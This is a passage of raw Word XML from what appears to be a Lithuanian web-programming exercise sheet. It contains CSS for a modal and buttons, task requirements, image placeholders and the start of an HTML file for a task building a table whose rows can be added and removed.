    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>transition: .5s ease;</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modal h2 {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>margin: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>font-weight: 400;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>padding: 1rem;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>border-bottom: 1px solid #DDE0E7;</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modal p {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>padding: 1rem;</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modal.active {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>visibility: visible;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>opacity: 1;</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utton {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>display: inline-block;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: rgba(10, 20, 30, .3);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>border: 1px solid transparent;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>color: white;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>text-decoration: none;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>font-size: 1.2rem;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>padding: 1rem 2rem;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>border-radius: 45px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>margin: .25rem 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>vertical-align: middle;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>line-height: 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>overflow: visible;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>white-space: nowrap;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>cursor: pointer;</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utton:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>border: 1px solid rgba(255, 255, 255, .8);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>color: white;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: rgba(255, 255, 255, .1);</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utton.close {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>margin: 0 0 1rem;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: #FC6468;</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button.close:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>border: 1px solid #FC6468;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>color: #FC6468;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: transparent;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Reikalavimai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00604E5C" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:t>HTML dokumente užrašyti nuorodas į stiliaus ir skripto failus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00604E5C" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:t>Naudojant selektorius, įvykius, metodus darbui su CSS klasėmis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pavyzdys:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EBD95A1" wp14:editId="3A2202AD">
            <wp:extent cx="2266315" cy="2226310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="182"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66315" cy="2226310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45CD81BC" wp14:editId="77F6EFCC">
            <wp:extent cx="2266315" cy="2783205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183"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315" cy="2783205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>4 užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="00A03C58">
        <w:t xml:space="preserve"> SUKURKITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> DINAMIŠKĄ LENTELĘ SU GALIMYBE PRIDĖTI IR PAŠALINTI LENTELĖS EILUTES</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES SĄLYGA: užrašyti skriptą, kuris įgyvendintų tokį funkcionalumą: duomenis, esančius formos laukeliuose įrašytų į lentelę, o mygtukas po lentele leistų ištrinti pažymėtas lentelės eilutes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">DUOTA: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E660F6" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="720" w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00F52ADD" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000262D2" w:rsidRPr="00AD4464">
        <w:t>index.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;html lang="en"&g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lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;meta charset="utf-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.2.1/css/bootstrap.min.css" integrity="sha384-GJzZqFGwb1QTTN6wy59ffF1BuGJpLSa9DkKMp0DgiMDm4iYMj70gZWKYbI706tWS"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">        crossorigin="anonymous"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;title&gt;Add/Remove Table Rows Dynamically&lt;/title&g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lt;/head&g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lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;div class="container"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
